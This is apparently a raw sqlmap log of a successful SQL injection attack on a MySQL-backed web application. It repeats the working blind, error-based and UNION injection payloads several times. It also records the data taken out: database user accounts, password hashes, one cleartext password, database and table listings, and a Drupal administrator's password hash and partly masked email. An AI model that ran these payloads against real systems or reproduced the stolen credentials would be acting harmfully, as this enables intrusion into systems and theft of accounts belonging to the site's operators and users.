--- Parameter: Name (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: Name=5 AND 7247=7247 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: Name=5 AND (SELECT 7924 FROM(SELECT COUNT(*),CONCAT(0x716a786b71,(SELECT (ELT(7924=7924,1))),0x7176706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: Name=5 UNION ALL SELECT NULL,CONCAT(0x716a786b71,0x51736b7457494b7459736b6f5462756f59564a4c7154714649424b574c496e6b584a5a7343524162,0x7176706b71),NULL,NULL,NULL,NULL,NULL-- - --- web application technology: Apache 2.2.11, PHP 5.2.9 back-end DBMS: MySQL 5.0 current user: 'libadmin@localhost' current user is DBA: True sqlmap resumed the following injection point(s) from stored session: --- Parameter: Name (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: Name=5 AND 7247=7247 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: Name=5 AND (SELECT 7924 FROM(SELECT COUNT(*),CONCAT(0x716a786b71,(SELECT (ELT(7924=7924,1))),0x7176706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: Name=5 UNION ALL SELECT NULL,CONCAT(0x716a786b71,0x51736b7457494b7459736b6f5462756f59564a4c7154714649424b574c496e6b584a5a7343524162,0x7176706b71),NULL,NULL,NULL,NULL,NULL-- - --- web application technology: Apache 2.2.11, PHP 5.2.9 back-end DBMS: MySQL 5.0 database management system users [15]: [*] ''@'**.**.**.**' [*] ''@'localhost' [*] 'bedework'@'localhost' [*] 'cyrus'@'localhost' [*] 'drupaladmin'@'localhost' [*] 'k-int'@'%' [*] 'k-int'@'localhost' [*] 'k-int'@'localhost.localdomain' [*] 'libadmin'@'localhost' [*] 'root'@'%' [*] 'root'@'**.**.**.**' [*] 'root'@'localhost' [*] 'webmaster'@'localhost' [*] 'ytchan'@'%' [*] 'ytchan'@'localhost' database management system users password hashes: [*] bedework [1]: password hash: *E26974F8045E6ECA8128A1E1C1D55D9BC52E2021 [*] cyrus [1]: password hash: 0fbb151240eba632 [*] drupaladmin [1]: password hash: *1B115C8686F44EDCBE17EE011036F5169369F142 [*] k-int [1]: password hash: *57757CE41C70F94CB61B6535042D3AE81F850890 clear-text password: k-int [*] libadmin [1]: password hash: 3ecbe55800a74341 [*] root [3]: password hash: *072795647D4FE5EDB989760EF5DD0226607E581F password hash: 73a47b344566b63d password hash: NULL [*] webmaster [1]: password hash: 556231f40fe05b86 [*] ytchan [1]: password hash: *E5D13973ADDEE653A8A656525C70FCC970765B38 sqlmap resumed the following injection point(s) from stored session: --- Parameter: Name (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: Name=5 AND 7247=7247 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: Name=5 AND (SELECT 7924 FROM(SELECT COUNT(*),CONCAT(0x716a786b71,(SELECT (ELT(7924=7924,1))),0x7176706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: Name=5 UNION ALL SELECT NULL,CONCAT(0x716a786b71,0x51736b7457494b7459736b6f5462756f59564a4c7154714649424b574c496e6b584a5a7343524162,0x7176706b71),NULL,NULL,NULL,NULL,NULL-- - --- web application technology: Apache 2.2.11, PHP 5.2.9 back-end DBMS: MySQL 5.0 available databases [21]: [*] banner [*] drupaldb [*] event [*] faq [*] forum_smf [*] gcal [*] information_schema [*] journal [*] library [*] limesurvey [*] mrbs [*] mysql [*] old_faq [*] old_forum_smf [*] openroom [*] selling [*] smille [*] survey [*] tbl_test [*] testmrbs [*] uccass sqlmap resumed the following injection point(s) from stored session: --- Parameter: Name (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: Name=5 AND 7247=7247 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: Name=5 AND (SELECT 7924 FROM(SELECT COUNT(*),CONCAT(0x716a786b71,(SELECT (ELT(7924=7924,1))),0x7176706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: Name=5 UNION ALL SELECT NULL,CONCAT(0x716a786b71,0x51736b7457494b7459736b6f5462756f59564a4c7154714649424b574c496e6b584a5a7343524162,0x7176706b71),NULL,NULL,NULL,NULL,NULL-- - --- web application technology: Apache 2.2.11, PHP 5.2.9 back-end DBMS: MySQL 5.0 available databases [21]: [*] banner [*] drupaldb [*] event [*] faq [*] forum_smf [*] gcal [*] information_schema [*] journal [*] library [*] limesurvey [*] mrbs [*] mysql [*] old_faq [*] old_forum_smf [*] openroom [*] selling [*] smille [*] survey [*] tbl_test [*] testmrbs [*] uccass sqlmap resumed the following injection point(s) from stored session: --- Parameter: Name (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: Name=5 AND 7247=7247 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: Name=5 AND (SELECT 7924 FROM(SELECT COUNT(*),CONCAT(0x716a786b71,(SELECT (ELT(7924=7924,1))),0x7176706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: Name=5 UNION ALL SELECT NULL,CONCAT(0x716a786b71,0x51736b7457494b7459736b6f5462756f59564a4c7154714649424b574c496e6b584a5a7343524162,0x7176706b71),NULL,NULL,NULL,NULL,NULL-- - --- web application technology: Apache 2.2.11, PHP 5.2.9 back-end DBMS: MySQL 5.0 Database: drupaldb [74 tables] +-----------------------------+ | actions | | authmap | | batch | | block | | block_custom | | block_node_type | | block_role | | blocked_ips | | cache | | cache_block | | cache_bootstrap | | cache_field | | cache_filter | | cache_form | | cache_image | | cache_menu | | cache_page | | cache_path | | cache_update | | comment | | date_format_locale | | date_format_type | | date_formats | | field_config | | field_config_instance | | field_data_body | | field_data_comment_body | | field_data_field_image | | field_data_field_tags | | field_revision_body | | field_revision_comment_body | | field_revision_field_image | | field_revision_field_tags | | file_managed | | file_usage | | filter | | filter_format | | flood | | history | | image_effects | | image_styles | | menu_custom | | menu_links | | menu_router | | node | | node_access | | node_comment_statistics | | node_revision | | node_type | | queue | | rdf_mapping | | registry | | registry_file | | role | | role_permission | | search_dataset | | search_index | | search_node_links | | search_total | | semaphore | | sequences | | sessions | | shortcut_set | | shortcut_set_users | | system | | taxonomy_index | | taxonomy_term_data | | taxonomy_term_hierarchy | | taxonomy_vocabulary | | url_alias | | users | | users_roles | | variable | | watchdog | +-----------------------------+ sqlmap resumed the following injection point(s) from stored session: --- Parameter: Name (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: Name=5 AND 7247=7247 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: Name=5 AND (SELECT 7924 FROM(SELECT COUNT(*),CONCAT(0x716a786b71,(SELECT (ELT(7924=7924,1))),0x7176706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: Name=5 UNION ALL SELECT NULL,CONCAT(0x716a786b71,0x51736b7457494b7459736b6f5462756f59564a4c7154714649424b574c496e6b584a5a7343524162,0x7176706b71),NULL,NULL,NULL,NULL,NULL-- - --- web application technology: Apache 2.2.11, PHP 5.2.9 back-end DBMS: MySQL 5.0 Database: drupaldb Table: users [16 columns] +------------------+------------------+ | Column | Type | +------------------+------------------+ | language | varchar(12) | | access | int(11) | | created | int(11) | | data | longblob | | init | varchar(254) | | login | int(11) | | mail | varchar(254) | | name | varchar(60) | | pass | varchar(128) | | picture | int(11) | | signature | varchar(255) | | signature_format | varchar(255) | | status | tinyint(4) | | theme | varchar(255) | | timezone | varchar(32) | | uid | int(10) unsigned | +------------------+------------------+ sqlmap resumed the following injection point(s) from stored session: --- Parameter: Name (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: Name=5 AND 7247=7247 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: Name=5 AND (SELECT 7924 FROM(SELECT COUNT(*),CONCAT(0x716a786b71,(SELECT (ELT(7924=7924,1))),0x7176706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: Name=5 UNION ALL SELECT NULL,CONCAT(0x716a786b71,0x51736b7457494b7459736b6f5462756f59564a4c7154714649424b574c496e6b584a5a7343524162,0x7176706b71),NULL,NULL,NULL,NULL,NULL-- - --- web application technology: Apache 2.2.11, PHP 5.2.9 back-end DBMS: MySQL 5.0 Database: drupaldb Table: users [2 entries] +------------+---------------------------------------------------------+-------------------+ | name | pass | mail | +------------+---------------------------------------------------------+-------------------+ | <blank> | <blank> | <blank> | | hksyuadmin | $S$DveEXoQlV9/5yFpYH9QUUEMfVE1yzsl.WsIuGWCxW6RK5UeifECc | libinfo@**.**.**.** | +------------+---------------------------------------------------------+-------------------+